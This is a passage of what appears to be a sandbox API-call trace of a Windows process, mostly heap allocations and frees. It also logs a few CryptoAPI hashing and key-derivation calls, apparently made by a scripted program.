hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.377] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0222.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0222.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0222.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0222.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0222.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0222.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0222.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0222.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0222.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51508 [0222.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0222.381] CryptHashData (hHash=0xa87510, pbData=0x2e550f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0222.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0222.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0222.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0222.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0222.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.385] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0222.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0222.386] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0222.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0222.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.386] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0222.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51418, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0222.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.386] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0222.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0222.387] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87710) returned 1 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 